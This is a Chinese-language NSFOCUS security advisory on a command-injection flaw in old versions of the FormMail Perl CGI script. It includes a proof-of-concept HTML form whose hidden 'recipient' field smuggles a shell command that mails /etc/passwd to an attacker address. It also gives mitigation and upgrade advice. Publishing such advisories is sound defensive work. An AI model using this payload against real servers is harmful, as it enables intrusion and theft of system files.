首页 -> 安全研究

安全研究

安全漏洞
Matt Wright FormMail远程执行任意命令漏洞

发布日期:1995-08-02
更新日期:2001-11-28

受影响系统:
Matt Wright FormMail 1.8
Matt Wright FormMail 1.7
Matt Wright FormMail 1.6
Matt Wright FormMail 1.5
Matt Wright FormMail 1.4
Matt Wright FormMail 1.3
Matt Wright FormMail 1.2
Matt Wright FormMail 1.1
Matt Wright FormMail 1.0
不受影响系统:
Matt Wright FormMail 1.9
描述:
BUGTRAQ  ID: 2079
CVE(CAN) ID: CVE-1999-0172

FormMail是一个由Matt Wright写的发送邮件CGI程序,用Perl语言实现,可以用来通过Web向指定邮件地址发送邮件。

早期的formmail.pl脚本实现上存在漏洞,远程攻击者可以利用此漏洞以Web服务进程的权限在主机上执行任意系统命令。

问题在于程序脚本没有过滤检查用户输入就把它直接提供给Perl的OPEN()调用,远程攻击者可以在隐藏类型的脚本参数'recipient'中插入';'等shell转义字符,脚本进行OPEN()调用的时候就会执行攻击者指定的命令,所以远程攻击者能利用此漏洞以Web守护程序的权限(root或nobody)在主机上执行任意命令。


<*来源:Paul Phillips (paulp@cerf.net
  
  链接:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0262
        http://xforce.iss.net/static/4917.php
        http://online.securityfocus.com/bid/2079/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

创建一个类似下面的网页,双击打开就可以把系统的passwd文件发送到hack@hotmail.com


<html>
<head><title>Formmail Hack</title></head>

<body>
<form method="post"
action="http://www.target.com/cgi-bin/formmail.pl">

<input type="hidden" name="recipient" value="hack@hotmail.com;
cat /etc/passwd | mail hack@hotmail.com">

<input type="submit" name="submit" value="submit">
</form>
</body>
</html>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在漏洞修补以前暂时停止此程序的使用,去除此脚本的执行权限或删除之。

厂商补丁:

Matt Wright
-----------
厂商已经在FormMail 1.9及以上版本的软件中修补了这个安全漏洞,请到厂商的主页下载:

Matt Wright Upgrade Formmail 1.9
http://www.worldwidemart.com/scripts/readme/formmail.shtml

浏览次数:3340
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障